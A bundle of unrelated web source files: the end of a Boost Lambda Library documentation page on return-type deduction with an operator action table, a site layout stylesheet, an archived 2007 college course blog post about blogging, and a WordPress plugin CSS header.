E.g., adding <code class="literal">my_vector<int></code> and
<code class="literal">my_vector<double></code> results in
<code class="literal">my_vector<double></code>.
The BLL has traits classes to perform the implicit built-in and standard
type conversions between integral, floating point, and complex classes.
Using BLL tools, the addition operator described above can be defined as:
</p>
<pre class="programlisting">
template<class A, class B>
my_vector<typename return_type_2<arithmetic_action<plus_action>, A, B>::type>
operator+(const my_vector<A>& a, const my_vector<B>& b)
{
typedef typename
return_type_2<arithmetic_action<plus_action>, A, B>::type res_type;
return my_vector<res_type>();
}
</pre>
<p>
</p>
<p>
To allow BLL to deduce the type of <code class="literal">my_vector</code>
additions correctly, we can define:
</p>
<pre class="programlisting">
template<class A, class B>
class plain_return_type_2<arithmetic_action<plus_action>,
my_vector<A>, my_vector<B> > {
typedef typename
return_type_2<arithmetic_action<plus_action>, A, B>::type res_type;
public:
typedef my_vector<res_type> type;
};
</pre>
<p>
Note, that we are reusing the existing specializations for the
BLL <code class="literal">return_type_2</code> template,
which require that the argument types are references.
</p>
<div class="table">
<a name="table:actions"></a><p class="title"><b>Table 11.2. Action types</b></p>
<div class="table-contents"><table class="table" summary="Action types">
<colgroup>
<col>
<col>
</colgroup>
<tbody>
<tr>
<td><code class="literal">+</code></td>
<td><code class="literal">arithmetic_action<plus_action></code></td>
</tr>
<tr>
<td><code class="literal">-</code></td>
<td><code class="literal">arithmetic_action<minus_action></code></td>
</tr>
<tr>
<td><code class="literal">*</code></td>
<td><code class="literal">arithmetic_action<multiply_action></code></td>
</tr>
<tr>
<td><code class="literal">/</code></td>
<td><code class="literal">arithmetic_action<divide_action></code></td>
</tr>
<tr>
<td><code class="literal">%</code></td>
<td><code class="literal">arithmetic_action<remainder_action></code></td>
</tr>
<tr>
<td><code class="literal">+</code></td>
<td><code class="literal">unary_arithmetic_action<plus_action></code></td>
</tr>
<tr>
<td><code class="literal">-</code></td>
<td><code class="literal">unary_arithmetic_action<minus_action></code></td>
</tr>
<tr>
<td><code class="literal">&</code></td>
<td><code class="literal">bitwise_action<and_action></code></td>
</tr>
<tr>
<td><code class="literal">|</code></td>
<td><code class="literal">bitwise_action<or_action></code></td>
</tr>
<tr>
<td><code class="literal">~</code></td>
<td><code class="literal">bitwise_action<not_action></code></td>
</tr>
<tr>
<td><code class="literal">^</code></td>
<td><code class="literal">bitwise_action<xor_action></code></td>
</tr>
<tr>
<td><code class="literal"><<</code></td>
<td><code class="literal">bitwise_action<leftshift_action_no_stream></code></td>
</tr>
<tr>
<td><code class="literal">>></code></td>
<td><code class="literal">bitwise_action<rightshift_action_no_stream></code></td>
</tr>
<tr>
<td><code class="literal">&&</code></td>
<td><code class="literal">logical_action<and_action></code></td>
</tr>
<tr>
<td><code class="literal">||</code></td>
<td><code class="literal">logical_action<or_action></code></td>
</tr>
<tr>
<td><code class="literal">!</code></td>
<td><code class="literal">logical_action<not_action></code></td>
</tr>
<tr>
<td><code class="literal"><</code></td>
<td><code class="literal">relational_action<less_action></code></td>
</tr>
<tr>
<td><code class="literal">></code></td>
<td><code class="literal">relational_action<greater_action></code></td>
</tr>
<tr>
<td><code class="literal"><=</code></td>
<td><code class="literal">relational_action<lessorequal_action></code></td>
</tr>
<tr>
<td><code class="literal">>=</code></td>
<td><code class="literal">relational_action<greaterorequal_action></code></td>
</tr>
<tr>
<td><code class="literal">==</code></td>
<td><code class="literal">relational_action<equal_action></code></td>
</tr>
<tr>
<td><code class="literal">!=</code></td>
<td><code class="literal">relational_action<notequal_action></code></td>
</tr>
<tr>
<td><code class="literal">+=</code></td>
<td><code class="literal">arithmetic_assignment_action<plus_action></code></td>
</tr>
<tr>
<td><code class="literal">-=</code></td>
<td><code class="literal">arithmetic_assignment_action<minus_action></code></td>
</tr>
<tr>
<td><code class="literal">*=</code></td>
<td><code class="literal">arithmetic_assignment_action<multiply_action></code></td>
</tr>
<tr>
<td><code class="literal">/=</code></td>
<td><code class="literal">arithmetic_assignment_action<divide_action></code></td>
</tr>
<tr>
<td><code class="literal">%=</code></td>
<td><code class="literal">arithmetic_assignment_action<remainder_action></code></td>
</tr>
<tr>
<td><code class="literal">&=</code></td>
<td><code class="literal">bitwise_assignment_action<and_action></code></td>
</tr>
<tr>
<td><code class="literal">=|</code></td>
<td><code class="literal">bitwise_assignment_action<or_action></code></td>
</tr>
<tr>
<td><code class="literal">^=</code></td>
<td><code class="literal">bitwise_assignment_action<xor_action></code></td>
</tr>
<tr>
<td><code class="literal"><<=</code></td>
<td><code class="literal">bitwise_assignment_action<leftshift_action></code></td>
</tr>
<tr>
<td><code class="literal">>>=</code></td>
<td><code class="literal">bitwise_assignment_action<rightshift_action></code></td>
</tr>
<tr>
<td><code class="literal">++</code></td>
<td><code class="literal">pre_increment_decrement_action<increment_action></code></td>
</tr>
<tr>
<td><code class="literal">--</code></td>
<td><code class="literal">pre_increment_decrement_action<decrement_action></code></td>
</tr>
<tr>
<td><code class="literal">++</code></td>
<td><code class="literal">post_increment_decrement_action<increment_action></code></td>
</tr>
<tr>
<td><code class="literal">--</code></td>
<td><code class="literal">post_increment_decrement_action<decrement_action></code></td>
</tr>
<tr>
<td><code class="literal">&</code></td>
<td><code class="literal">other_action<address_of_action></code></td>
</tr>
<tr>
<td><code class="literal">*</code></td>
<td><code class="literal">other_action<contents_of_action></code></td>
</tr>
<tr>
<td><code class="literal">,</code></td>
<td><code class="literal">other_action<comma_action></code></td>
</tr>
<tr>
<td><code class="literal">->*</code></td>
<td><code class="literal">other_action<member_pointer_action></code></td>
</tr>
</tbody>
</table></div>
</div>
<br class="table-break">
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 1999-2004 Jaakko Järvi, Gary Powell<p>Use, modification and distribution is subject to the Boost
Software License, Version 1.0. (See accompanying file
<code class="filename">LICENSE_1_0.txt</code> or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="le_in_details.html"><img src="../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../lambda.html"><img src="../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../index.html"><img src="../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="s07.html"><img src="../../../doc/html/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
app/skins/_common2/css/layout.css | chisimba/chisimba | html, body {
margin: 0;
}
#container {
margin: 25px;
padding: 10px;
}
#header {
margin: 0;
padding: 0;
}
#header_no_banner{
margin: 0;
padding: 0;
}
#rightcolumn div#left{
display:none
}
#left {
float: left;
width: 200px;
padding:5px;
overflow:hidden;
}
#threecolumn {
margin: 0px;
}
#twocolumn div#right{
display:none
}
#twocolumn div#content{
margin: 0 0 0 210px;
}
#content{
padding:5px;
overflow:auto;
}
#right {
float: right;
width: 200px;
padding:5px;
}
#footer {
text-align: center;
padding: 10px;
}
#footerbr {
clear: both;
}
#navigation {
padding-top:5px;
} |
51-2007/node/25/index.html | kfitz/machines | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>something funny just happened... | Introduction to New Media</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="../../misc/favicon.ico" type="image/x-icon" />
<style type="text/css" media="all">@import "../../modules/node/node.css";</style>
<style type="text/css" media="all">@import "../../modules/poll/poll.css";</style>
<style type="text/css" media="all">@import "../../modules/system/defaults.css";</style>
<style type="text/css" media="all">@import "../../modules/system/system.css";</style>
<style type="text/css" media="all">@import "../../modules/user/user.css";</style>
<style type="text/css" media="all">@import "../../sites/all/modules/tagadelic/tagadelic.css";</style>
<style type="text/css" media="all">@import "../../modules/comment/comment.css";</style>
<style type="text/css" media="all">@import "../../sites/all/themes/newmedia/style.css";</style>
<!--[if IE 6]>
<style type="text/css" media="all">@import "../../sites/all/themes/newmedia/ie-fixes/ie6.css";</style>
<![endif]-->
<!--[if lt IE 7.]>
<script defer type="text/javascript" src="../../sites/all/themes/newmedia/ie-fixes/pngfix.js"></script>
<![endif]-->
</head>
<body>
<div id="page">
<!-- begin wrapper -->
<div id="container">
<!-- primary links -->
<!-- begin header -->
<div id="header">
<!-- site logo -->
<!-- end site logo -->
<!-- site name -->
<h1>
<a href="../../index.html" title="Home">
Introduction to New Media </a>
</h1>
<!-- end site name -->
<!-- site slogan -->
<!-- end site slogan -->
<div id="menu">
<ul class="links-menu">
<li><a href="http://machines.plannedobsolescence.net" title="associate professor of english and media studies">kathleen fitzpatrick</a></li>
<li><a href="http://www.pomona.edu" title="in claremont, california">pomona college</a></li>
</ul> </div><!-- end primary links -->
</div><!-- end header -->
<!-- search box in nowhere land - NEEDS WORK-->
<!-- end search box -->
<!-- content -->
<!-- <div id="main">-->
<!-- begin main content -->
<div id="mainContent" style="width: 530px;">
<div class="breadcrumb"><div class="breadcrumb"><a href="../../index.html">Home</a> » <a href="../../blog/index.html">Blogs</a> » <a href="../../blog/14/index.html">SunnydaleGal's blog</a></div></div> <h1 class="pageTitle">something funny just happened...</h1> <div class="node">
<div class="submitted">By SunnydaleGal - Posted on 23 January 2007 - 10:51pm.</div>
<div class="taxonomy">Tagged: <ul class="links inline"><li class="first last taxonomy_term_2"><a href="../../taxonomy/term/2/index.html" rel="tag" title="" class="taxonomy_term_2">blogging</a></li>
</ul></div> <div class="content"><p>I thought this was amusing: I just posted my class schedule on my personal LiveJournal blog, and someone left a comment asking to see the syllabus because she was curious about what readings we'd been assigned. So I posted a link in my blog to our class blog as a reply to her comment, and now thanks to my LiveJournal she's probably reading our syllabus on this site. And reading our blogs about blogging thanks to the link she got from a blog... and reading this post about the scenario. Now there's some meta for ya...!</p>
</div>
<div class="links"><ul class="links inline"><li class="first last blog_usernames_blog"><a href="../../blog/14/index.html" title="Read SunnydaleGal's latest blog entries." class="blog_usernames_blog">SunnydaleGal's blog</a></li>
</ul></div> </div>
<div id="comments"></div>
</div>
<!-- Begin Sidebars -->
<div id="sideBars-bg" style="width: 415px;">
<div id="sideBars" style="width: 415px;">
<!-- left sidebar -->
<div id="leftSidebar">
<div class="block block-block" id="block-block-1">
<h2 class="title"></h2>
<div class="content"><p><a href="../../index.html">introduction to new media</a> is the spring 2007 course website for media studies 51 at pomona college in claremont, california.</p>
<p><a href="http://machines.plannedobsolescence.net">the professor</a><br />
<a href="../../syllabus/index.html">the syllabus</a><br />
<a href="../../wiki/index.html">the wiki</a><br />
<a href="https://sakai.claremont.edu/portal/site/CX_mtg_26747">the sakai site</a><br />
<a href="../../taxonomy/term/1/index.html">more information</a></p>
</div>
</div>
<div class="block block-tagadelic" id="block-tagadelic-1">
<h2 class="title">tags</h2>
<div class="content"><a href="../../taxonomy/term/56/index.html" class="tagadelic level2" rel="tag">Artificial Intelligence</a>
<a href="../../taxonomy/term/14/index.html" class="tagadelic level2" rel="tag">blog</a>
<a href="../../taxonomy/term/2/index.html" class="tagadelic level10" rel="tag">blogging</a>
<a href="../../taxonomy/term/42/index.html" class="tagadelic level8" rel="tag">class discussion</a>
<a href="../../taxonomy/term/4/index.html" class="tagadelic level10" rel="tag">class reading</a>
<a href="../../taxonomy/term/8/index.html" class="tagadelic level1" rel="tag">community</a>
<a href="../../taxonomy/term/1/index.html" class="tagadelic level2" rel="tag">course information</a>
<a href="../../taxonomy/term/106/index.html" class="tagadelic level2" rel="tag">cyborg</a>
<a href="../../taxonomy/term/77/index.html" class="tagadelic level3" rel="tag">Facade</a>
<a href="../../taxonomy/term/119/index.html" class="tagadelic level3" rel="tag">final project</a>
<a href="../../taxonomy/term/7/index.html" class="tagadelic level3" rel="tag">first blog</a>
<a href="../../taxonomy/term/36/index.html" class="tagadelic level2" rel="tag">Future</a>
<a href="../../taxonomy/term/64/index.html" class="tagadelic level2" rel="tag">Machines</a>
<a href="../../taxonomy/term/79/index.html" class="tagadelic level2" rel="tag">midterm project</a>
<a href="../../taxonomy/term/13/index.html" class="tagadelic level1" rel="tag">Music</a>
<a href="../../taxonomy/term/20/index.html" class="tagadelic level3" rel="tag">new generation</a>
<a href="../../taxonomy/term/31/index.html" class="tagadelic level6" rel="tag">new media</a>
<a href="../../taxonomy/term/70/index.html" class="tagadelic level8" rel="tag">Proposal</a>
<a href="../../taxonomy/term/112/index.html" class="tagadelic level2" rel="tag">sight machine</a>
<a href="../../taxonomy/term/22/index.html" class="tagadelic level2" rel="tag">social networking</a>
<a href="../../taxonomy/term/98/index.html" class="tagadelic level7" rel="tag">term project</a>
<a href="../../taxonomy/term/19/index.html" class="tagadelic level7" rel="tag">web 2.0</a>
<a href="../../taxonomy/term/24/index.html" class="tagadelic level8" rel="tag">wiki</a>
<a href="../../taxonomy/term/18/index.html" class="tagadelic level6" rel="tag">Wikipedia</a>
<a href="../../taxonomy/term/34/index.html" class="tagadelic level6" rel="tag">YouTube</a>
<div class='more-link'><a href="../../tagadelic/chunk/1/index.html">more tags</a></div></div>
</div>
<div class="block block-user" id="block-user-1">
<h2 class="title">Navigation</h2>
<div class="content">
<ul class="menu">
<li class="leaf"><a href="../../tracker/index.html">Recent posts</a></li>
</ul>
</div>
</div>
</div>
<!-- right sidebar -->
<div id="rightSidebar">
<div class="block block-comment" id="block-comment-0">
<h2 class="title">Recent comments</h2>
<div class="content"><div class="item-list"><ul><li><a href="../247/index.html#comment-440">resistance</a><br />3 years 51 weeks ago</li><li><a href="../264/index.html#comment-439">20 hours of source</a><br />3 years 51 weeks ago</li><li><a href="../262/index.html#comment-438">used?</a><br />3 years 51 weeks ago</li><li><a href="../261/index.html#comment-437">it's everywhere</a><br />3 years 51 weeks ago</li><li><a href="../264/index.html#comment-436">Really good! I liked how you</a><br />3 years 51 weeks ago</li><li><a href="../264/index.html#comment-435">nice!</a><br />3 years 51 weeks ago</li><li><a href="../251/index.html#comment-434">Linux Parody</a><br />3 years 51 weeks ago</li><li><a href="../259/index.html#comment-433">Me Too!</a><br />3 years 51 weeks ago</li><li><a href="../261/index.html#comment-432">McDonald's</a><br />3 years 51 weeks ago</li><li><a href="../264/index.html#comment-431">Slash Fan Vid</a><br />3 years 51 weeks ago</li></ul></div></div>
</div>
<div class="block block-block" id="block-block-2">
<h2 class="title"></h2>
<div class="content"><h3>social software tools</h3>
<ul>
<li><a href="http://technorati.com/" target="_blank">Technorati</a></li>
<li><a href="http://del.icio.us/" target="_blank">del.icio.us</a></li>
<li><a href="http://www.flickr.com/" target="_blank">Flickr</a></li>
<li><a href="http://www.bloglines.com/" target="_blank">Bloglines</a></li>
<li><a href="http://www.youtube.com/" target="_blank">YouTube</a></li>
</ul>
<h3>new media studies sites</h3>
<ul>
<li><a href="http://www.digitalhumanities.org/companion/" target="_blank">A Companion to Digital Humanities</a></li>
</ul>
</div>
</div>
</div>
</div><!-- end sidebars -->
</div><!-- end sideBars-bg -->
<!-- footer -->
<div id="footer">
</div><!-- end footer -->
</div><!-- end container -->
</div><!-- end page -->
<!-- Start of StatCounter Code -->
<script type="text/javascript">
var sc_project=3034095;
var sc_invisible=1;
var sc_partition=33;
var sc_security="ec028fa0";
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><a class="statcounter" href="http://www.statcounter.com/"><img class="statcounter" src="http://c34.statcounter.com/3034095/0/ec028fa0/1/" alt="blog stats" /></a></div></noscript>
<!-- End of StatCounter Code -->
</body>
</html>
<!-- Localized --> |
df-draggable-view.css | wp-plugins/df-draggable | /**
* @package DF Draggable
* @version 1.13.2
* @url http://wordpress.org/extend/plugins/df-draggable/
**/ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.